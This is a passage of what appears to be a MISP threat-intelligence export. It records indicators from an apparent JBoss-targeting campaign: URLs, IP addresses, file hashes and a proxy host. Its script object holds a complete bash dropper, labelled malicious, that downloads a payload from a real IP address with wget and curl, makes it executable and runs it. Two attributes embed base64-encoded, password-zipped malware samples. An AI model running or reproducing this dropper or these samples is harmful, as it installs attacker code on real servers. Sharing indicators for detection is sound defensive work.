|
"type": "text",
|
||
|
"uuid": "5cf237b6-37e8-4ebc-96ee-31bb950d210f",
|
||
|
"value": "/tmp/ofd"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
|
||
|
"meta-category": "misc",
|
||
|
"name": "script",
|
||
|
"template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
|
||
|
"template_version": "4",
|
||
|
"timestamp": "1559378154",
|
||
|
"uuid": "5cf23812-2ae8-4feb-8e8b-4a1f950d210f",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cf23812-2ae8-4feb-8e8b-4a1f950d210f",
|
||
|
"referenced_uuid": "5cf238a2-0e5c-447e-a584-4072950d210f",
|
||
|
"relationship_type": "contains",
|
||
|
"timestamp": "1559378154",
|
||
|
"uuid": "5cf238ea-30d8-4cb2-8a6d-471e950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "script",
|
||
|
"timestamp": "1559377938",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf23812-c074-4095-9201-4ad5950d210f",
|
||
|
"value": "#!/bin/sh\r\nid1=\"fkbgh\"\r\nid2=\"jm\"\r\nif [ -x \"/tmp/\" ] && [ -w \"/tmp/\" ]; then\r\nwget -O /tmp/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o /tmp/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x /tmp/`echo $id1`\r\nchmod 7777 /tmp/`echo $id1`\r\n/tmp/`echo $id1` &\r\nelif [ -x \"/var/tmp/\" ] && [ -w \"/var/tmp/\" ]; then\r\nwget -O /var/tmp/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o /var/tmp/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x /var/tmp/`echo $id1`\r\nchmod 7777 /var/tmp/`echo $id1`\r\n/var/tmp/`echo $id1` &\r\nelif [ -x \"/dev/shm/\" ] && [ -w \"/dev/shm/\" ]; then\r\nwget -O /dev/shm/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o /dev/shm/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x /dev/shm/`echo $id1`\r\nchmod 7777 /dev/shm/`echo $id1`\r\n/dev/shm/`echo $id1` &\r\nelif [ -x $JBOSS_HOME ] && [ -w $JBOSS_HOME ]; then\r\nwget -O $JBOSS_HOME/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o $JBOSS_HOME/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x $JBOSS_HOME/`echo $id1`\r\nchmod 7777 $JBOSS_HOME/`echo $id1`\r\n$JBOSS_HOME/`echo $id1` &\r\nelif [ -x $HOME ] && [ -w $HOME ]; then\r\nwget -O $HOME/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o $HOME/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x $HOME/`echo $id1`\r\nchmod 7777 $HOME/`echo $id1`\r\n$HOME/`echo $id1` &\r\nelse\r\nwget -O `echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o `echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x `echo $id1`\r\nchmod 7777 `echo $id1`\r\n`echo $id1` &\r\nfi"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "language",
|
||
|
"timestamp": "1559377938",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf23812-7958-4746-90ff-4f07950d210f",
|
||
|
"value": "Bash"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "state",
|
||
|
"timestamp": "1559377938",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf23812-9244-4ac6-b02d-44ee950d210f",
|
||
|
"value": "Malicious"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "url object describes an url along with its normalized field (like extracted using faup parsing library) and its metadata.",
|
||
|
"meta-category": "network",
|
||
|
"name": "url",
|
||
|
"template_uuid": "60efb77b-40b5-4c46-871b-ed1ed999fce5",
|
||
|
"template_version": "7",
|
||
|
"timestamp": "1559378082",
|
||
|
"uuid": "5cf238a2-0e5c-447e-a584-4072950d210f",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "url",
|
||
|
"timestamp": "1559378082",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cf238a2-48ac-4a0e-bd26-40a6950d210f",
|
||
|
"value": "http://185.165.169.6/jp/"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "url object describes an url along with its normalized field (like extracted using faup parsing library) and its metadata.",
|
||
|
"meta-category": "network",
|
||
|
"name": "url",
|
||
|
"template_uuid": "60efb77b-40b5-4c46-871b-ed1ed999fce5",
|
||
|
"template_version": "7",
|
||
|
"timestamp": "1559378300",
|
||
|
"uuid": "5cf2397c-b0a0-475d-b764-4c2a950d210f",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "url",
|
||
|
"timestamp": "1559378300",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cf2397c-5e34-4a1d-8852-4c8b950d210f",
|
||
|
"value": "http://87.236.212.237/tmp/ofd"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "scheme",
|
||
|
"timestamp": "1559378300",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf2397c-3538-4d28-a44c-47b8950d210f",
|
||
|
"value": "http"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "Used as proxy",
|
||
|
"deleted": false,
|
||
|
"description": "url object describes an url along with its normalized field (like extracted using faup parsing library) and its metadata.",
|
||
|
"meta-category": "network",
|
||
|
"name": "url",
|
||
|
"template_uuid": "60efb77b-40b5-4c46-871b-ed1ed999fce5",
|
||
|
"template_version": "7",
|
||
|
"timestamp": "1559378481",
|
||
|
"uuid": "5cf23a31-1db8-4b41-81af-4416950d210f",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "url",
|
||
|
"timestamp": "1559378481",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cf23a31-1560-497d-83a2-4da7950d210f",
|
||
|
"value": "http://41.203.146.142:8080"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "File object describing a file with meta-information",
|
||
|
"meta-category": "file",
|
||
|
"name": "file",
|
||
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
||
|
"template_version": "17",
|
||
|
"timestamp": "1559379790",
|
||
|
"uuid": "5cf23ef7-5138-4a1f-b773-4766950d210f",
"ObjectReference": [
{
"comment": "",
"object_uuid": "5cf23ef7-5138-4a1f-b773-4766950d210f",
"referenced_uuid": "5cf22fbc-cecc-465b-a261-4385950d210f",
"relationship_type": "related-to",
"timestamp": "1559379790",
"uuid": "5cf23f4e-8720-49cc-8c1e-4349950d210f"
}
],
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"data": "UEsDBBQACQAIADZIwU6CxKlJgN8AAOjiAAAgABwAOWFlN2RjNWZmMTM1MjZlOGNjNWI4YzIzNjA2NmE4MjhVVAkAA/c+8lz3PvJcdXgLAAEEIQAAAAQhAAAARygPQ/f/VIi0wiIIXUvKktfJXL5wZuYlCnd8f36yR4HgkXgpwISqKazCi2qoJ91SzTMXOy/1hO6AM9SraQPYJsiJPVAa4lf7B3J2YMMcksEUqqqOxjxBy5K7B9n9sWnNHY2LCf9V6yYxxKhZxJgmfm9go8tiKttCC2sJ9DyErmEQ05Zk4ZDTRjFtwtlPyKZq4ktLSDCMmnCnSgn0iKB/QfdlTw73uufxebk5lpG5ENAKWEM5qTn9bZxlxM8h6P8H9e4+y/BsX+0j/u75YZyw0MOw4jFuib9X0xffdvfccsu0glpCnMNI51xt0xqDtAyBXeX5s8jffC5Uq4Gu4tmY8Mr/gohSEIUruIRtq4Gh3Zj68sYlea/Zq6ItKRtmY2VFLpcw8YR8EPEsLUhJvTYn1bEO6SzujehxRz69Mf3YjChhDRdWLJ43tEv0j/e1GdqbjzoFPdjvHBQ9SL0yxMM+3xkkOQYWcHSptPnFDLRYYNBh1fg823zuvpcMOuKakNyqN+28IFTiXbMANiskvo380KahJzGNBM8m/8xj388MIbOhrKJEV03yHKXnCB/CV4O+gyzs4FNvTcDv/ppOc9CCyajFPk3jcC8kEfnWBKYI5lgDMv/a0tkZwWH50htA6ZytkpGcAHceipL3+eyeGnySOxDLLfpbh/dAuJvOhDbKPEjEVQEs//eVeQGKpfc7rLKN/kpky9FaLGtVGHyoseJZ4hq5ADCfSyBDZXi9z0EgC0QCxaf4I/sLT+9TGM+kZ/o0FrpWd9Y3Umx/LtzfCxe8AYvWKXWomfe1+1l5uqi30UI8w7d/8adXRw0qL1Trmt24uFguMmT0ebP8Nyah3sEybDYnm8eHXS413C4GEtn+ko3PU0bnQViPMtmwiVfot+h5RTTWeGil+mO+iRguuPH3i/48Ix1SC7y0J7LpORrpMgdwgY68EjVn4AIOgaLNw17N81fgnNMIEueEA06uzHnj8wK/BT4CoI8LXRtLfKAta5HdN7aR9yNzE0Kp2L55B1caAR6MG1UhMjT78289R1EpmDtp2NGjwragj/YJfY2Zr0F1GFvozsVSmnmWUMhj5Z08GcRdbXfXQT75nXkNBKUrGiRS5fzRWqxthaOkFsULyJuQ3CGEEXvYk5ff5BNikdCdLv71WMonGTBjGqoma/Cre9LWBFl2ERhrh8L18t2UQ0aunA8gYZAbRIpUWqai5Sf195q0EpjI7cDcSXYwzznqKB4y3Zf0HUqigq9OoLnqlnnqh1cS5Aq43KF3svG9b/awigx46iDUANAhAjOxQm03GztruV1LPaWZilj6gl1XHp07T2C7uQx+w2sie3Lb536BQYS/+HV82QQ8HtmOATLl/1DP0ECybosj4BtFgf9xuJeHbc1p2VHEEqieqVepVHBOyweEHm71Da2CFM4Js66ppL4d/l5QQwgc1BDk3OPN9lIViOD1efl4LEehDqjMz5Kg9nOIuxau/M2aL/wHuyJU0B56kVqESHL5Y3Un2OgJXm7gLHp4bRKyLZr41Esc9LNdirrqi19Y0GeKn25a2HuR0oQc01RTMaCXFSAvnKHZ8Qo03IsnSnfkruiQ2+LHCzGxtsHFxhC4buw/NtlgGXxkKcaVEp6M46HEhCKg0a5KIcFDUGtnjuncSx6soFipUiDpt9OV+7W47GJW3MWeWgetrKc2i3dd4tFrU41fqBkm/zMwQP7A3O2Ac7o5Mwr4xRCJ4p9KddWw8VCDNPHlEPn1LBnqaxS/5SMZzq/77V7zWtwIGpblCfT5AA1HfqatKAxijvpo/CqYfqhod144DtuTD1zHq+u/Oo2y6tILeoCJqk0oKaxVJvj60M/ZRRJpIpZXoGK87ZVoJJFnCoA
Rv0Ztz3CcLng9oNXdg3Y9cfWrqrbpAd5GaQkwYVy1T9lUg4owcXThMi/xRFUnHUITQLrcg4AvoMR07XPoMYGkzQRw/tRs6cKuHoYIIAGsYRrD0loELo6xFeEA3ZbdzhH+zjxesqd0ipjBbitE+KonvlqIe+DI2BK1dD0tzoMlx17qOc5nFWY5/XjdeWiIW20tgi3FT+S68CaJ3YubOmDWxH/FP0hfrDKug3DvfTFkZsb4mth/Ubiz/LnIB/d79rbW8qcNkgXzYBPutY1fdJmye1sr+JfrzzvAE1rrN3C4Qr8JaYaU6YhbphX+Aq0M4BmEddo5SFOARwwZCKQbLVMcOaYJzyWZwyQ0toLR5v1JZ4Mvj1HXqo06x4GWMWBj9haunqzqV3FV1MVWP/TZ2IOA1UfeD3/lU8mevTG57Qz9svUIt01OVb2Oh3fK5XztYyKTOxdfhvll7MbgmL5eo2ef11SlwtzYkfQwPKDeL1+beNa1ssReqhYssJKvQ1ccUBeLCEpPltWgs11dQo0bYyUxebYexC+lAVI3HuzIIH8W2dqdNGn03l4GNdU9lnPnkGm1KQ960pxztkmO19UqsI1Yhg/fh90LeSRpmYNLCU6gt+ZDn0rOHesqZnL+hcVY/ircAOFTTQ1R3qj1xy/DqmWDGU/QNfKe3nmNR5apUX0O3ETQvEFBY9E6eqCXA8D5ntXfuPsjOT6XyjJFFmpUwgJQ71Swq8eeslzrEcmvNQzD6NDj+5npckDP5I93nLP4JD0KdMkObKHZARyVGBPXLKZ+SPs8GD7gwBlgBzM934UxRJH28jLYPfW3vkssVh7YICmPYZFGHB9GQiOSzX+ukKMw6oSDcUS7U/Tg302gSYswCbHcRRT2EmPn04OQ17jPRN5xykUisdjo/FeQsJ/j/4L/nHiU+q02YFgUcxLw3sJMM+fJCXYJ0jZJWTc4K7A3g9BB3TilkJruyFtiiUuyBdn0o2MNl/ZPXeklRF90mPt3jusQjBObyXv0elDx6+DLRoDl6Wk7mOKArApmwL4oEhwi0I5iNbrQuAUuqtoHNfgr8U9mAIYKWoug9/VpIRsHyl71KBvyfivW2rs6zHj7qXNfkd+daLSPoCgbLl/zZfc/NS4Pc5JVlsd6nkT1QbxO/rN1KZC2420B63Pk4TyU6cB7BG35pIbNiAspkKuv+XKCCveINiqDRYecMxuyjyoz8FX5LCfyE1hAwuR0thnzER8YJjoeOE0jRXXqIIKvJBLzotCSIUpo7i6bJZDcJxUqtTXfs28+gWR3X2KK10EkGP8MZfFI/crjjL3f4Tjw17nzbjzA3NtryQidCIi3Ck6tzffBy2hhuKKzroMdOPJR/jIPdD4yvno4F3ReTMTePUBeyyzN5Cxphe8DhXhbPjIBO7xc9X4aa2GscP912C+jtJBLoXvoWFZwMytFJ85esraRzln2jHTB3IZFP4dEt3otGVpJrpqaX3gT//afnrqmS/aXGMJFeTNTEvHlTqIINUqT6PtOTtqwyIXfOlgCFctJgFI9PjV1WPGf+4nTPIl0PVuYiC+/lQwt1RmI568gjZQ6W6DRVUGmnxs47gtlIWvuZYHrah6Jhw7aeNhv0QQEIdHepFpyEu2XGwZ1fvage4wvG/QRoSdV2y0II+THaLXDk9wQmMrSftftRZhTLs4jHjXsy7TFDhGf+HLsItf5f7woGQ9+RT2jMd9FleuHx6QDY3q4FnaNBMem6SNPFRCipjTFXp/C8uLVfGBe9wuH8F9LLgd/nPlbl33+ukJYP6USSqgXKF4+zEytzPxnT9kZ1DZdxG8sQZuHk9myGtmqgeWOm2DRpjQ9y/32+PrDm/oKiHhW9hLPvOw++w7DYE4V9eAs9wXw6qrfxLihhZj9eK+ai9mYH8kjbqc3QFuLKE9NMS+V+H7sCX6K1aLknGPvOEJxhZ2ffs8SUWyJMeAahjBH5mY+fpBk5zIA7XPGGWmrty9xieFBgGb5e3fOvab
xDe9EEfrbpYiKBFgnrzsAMOao6c1NDto4yU5wwS5VmplIAYcYD76UjcVpfjZePPrb7RRsS8b5XC3rh9L1Rg
"deleted": false,
"disable_correlation": false,
"object_relation": "malware-sample",
"timestamp": "1559379704",
"to_ids": true,
"type": "malware-sample",
"uuid": "5cf23ef8-dbdc-45cb-8ca1-450e950d210f",
"value": "3d02bbddc185352ddc1dea20f54e2f2b39f180a9bd26d8453b5ad7b983466c95|9ae7dc5ff13526e8cc5b8c236066a828"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "filename",
"timestamp": "1559379704",
"to_ids": false,
"type": "filename",
"uuid": "5cf23ef8-9804-476f-afd2-4eaf950d210f",
"value": "3d02bbddc185352ddc1dea20f54e2f2b39f180a9bd26d8453b5ad7b983466c95"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1559379704",
"to_ids": true,
"type": "md5",
"uuid": "5cf23ef8-0318-46ce-9019-4854950d210f",
"value": "9ae7dc5ff13526e8cc5b8c236066a828"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1559379704",
"to_ids": true,
"type": "sha1",
"uuid": "5cf23ef8-d628-4196-93e4-4608950d210f",
"value": "69af27d553292952e4d93338c44b0f4e66a15470"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1559379704",
"to_ids": true,
"type": "sha256",
"uuid": "5cf23ef8-f698-463d-b69e-4d4e950d210f",
"value": "3d02bbddc185352ddc1dea20f54e2f2b39f180a9bd26d8453b5ad7b983466c95"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1559379704",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "5cf23ef8-708c-40b8-949d-4873950d210f",
"value": "58088"
}
]
},
{
"comment": "Most probably compromised host",
"deleted": false,
"description": "An IP address (or domain or hostname) and a port seen as a tuple (or as a triple) in a specific time frame.",
"meta-category": "network",
"name": "ip-port",
"template_uuid": "9f8cea74-16fe-4968-a2b4-026676949ac6",
"template_version": "8",
"timestamp": "1559379945",
"uuid": "5cf23fe9-25c8-47df-a38a-4325950d210f",
"Attribute": [
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ip",
"timestamp": "1559379945",
"to_ids": true,
"type": "ip-dst",
"uuid": "5cf23fe9-6a38-49ca-8933-4325950d210f",
"value": "45.77.54.157"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "17",
"timestamp": "1559380191",
"uuid": "5cf24083-6de0-42e3-9ae7-4129950d210f",
"ObjectReference": [
{
"comment": "",
"object_uuid": "5cf24083-6de0-42e3-9ae7-4129950d210f",
"referenced_uuid": "5cf240b4-352c-40a3-8aba-40b5950d210f",
"relationship_type": "downloaded-from",
"timestamp": "1559380191",
"uuid": "5cf240df-62b0-4730-b555-443b950d210f"
}
],
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"data": "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
"deleted": false,
"disable_correlation": false,
"object_relation": "malware-sample",
"timestamp": "1559380099",
"to_ids": true,
"type": "malware-sample",
"uuid": "5cf24083-e570-445a-b777-4dab950d210f",
"value": "slpr|f049ae13406fdebadb10960bc0deee87"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "filename",
"timestamp": "1559380099",
"to_ids": false,
"type": "filename",
"uuid": "5cf24083-902c-49e9-aa0c-4718950d210f",
"value": "slpr"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1559380099",
"to_ids": true,
"type": "md5",
"uuid": "5cf24083-6a48-4363-b324-4451950d210f",
"value": "f049ae13406fdebadb10960bc0deee87"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1559380099",
"to_ids": true,
"type": "sha1",
"uuid": "5cf24083-c6c0-4d5c-9316-434c950d210f",
"value": "da05b42311606eaa03ca8edd6a94ff2eacd44c2b"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1559380099",
"to_ids": true,
"type": "sha256",
"uuid": "5cf24083-2c2c-4d3d-8ed5-4c5e950d210f",
"value": "62ca3fd070d6447e844c76e4bedcce908a18bc275c1a713415d11838b1cb5f04"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1559380099",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "5cf24083-8908-4603-a951-4f6f950d210f",
"value": "88728"
}
]
},
{
"comment": "",
"deleted": false,
"description": "url object describes an url along with its normalized field (like extracted using faup parsing library) and its metadata.",
"meta-category": "network",
"name": "url",
"template_uuid": "60efb77b-40b5-4c46-871b-ed1ed999fce5",
"template_version": "7",
"timestamp": "1559380148",
"uuid": "5cf240b4-352c-40a3-8aba-40b5950d210f",
"Attribute": [
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "url",
"timestamp": "1559380148",
"to_ids": true,
"type": "url",
"uuid": "5cf240b4-fd50-484e-ab61-4e7a950d210f",
"value": "37.228.129.58/home/slpr"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "scheme",
"timestamp": "1559380148",
"to_ids": false,
"type": "text",
"uuid": "5cf240b4-261c-4b77-8364-4a0d950d210f",
"value": "http"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "resource_path",
"timestamp": "1559380148",
"to_ids": false,
"type": "text",
"uuid": "5cf240b4-15a4-4db3-b0dc-4954950d210f",
"value": "/home/slpr"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Microblog post like a Twitter tweet or a post on a Facebook wall.",
"meta-category": "misc",
"name": "microblog",
